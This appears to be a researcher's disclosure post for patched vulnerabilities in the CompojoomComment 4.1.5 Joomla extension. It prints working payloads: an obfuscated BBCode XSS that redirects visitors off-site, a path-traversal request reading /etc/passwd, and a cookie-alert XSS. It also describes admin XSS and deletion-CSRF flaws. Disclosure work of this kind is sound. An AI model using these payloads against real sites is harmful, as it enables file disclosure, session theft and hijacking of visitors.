Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).
Malformed BBCode Persistent XSS, #1
Malformed BBCode Persistent XSS, #2
[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]
Local File Inclusion
?option=com_comment &no_html=1 &component=../../../../../../../../../../../../etc/passwd%00 &joscsectionid=0 &josctask=ajax_search &comment_id=0 &content_id=999 &search_keyword=a &search_phrase=any
?option=com_comment &no_html=1 &component=<script>alert(document.cookie);</script> &joscsectionid=0 &josctask=ajax_search &comment_id=0 &content_id=999 &search_keyword=a &search_phrase=any
Administrator Persistent XSS
Name & Title inputs in comment edit aren't sanitized - a double quote in either field will allow for XSS in admin IF the admin edits that comment...
Comment Deletion CSRF
Embedding the "delete comment" URL in an [img] BBCode would result in comment deletion if an authorized admin loaded the page
- Vulnerabilities Discovered: 4-9 August 2010
- Vendor Notified: 4-9 August 2010
- Vendor Response: 4-9 August 2010
- Update Available: 9 August 2010
- Disclosure: 1 September 2010
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.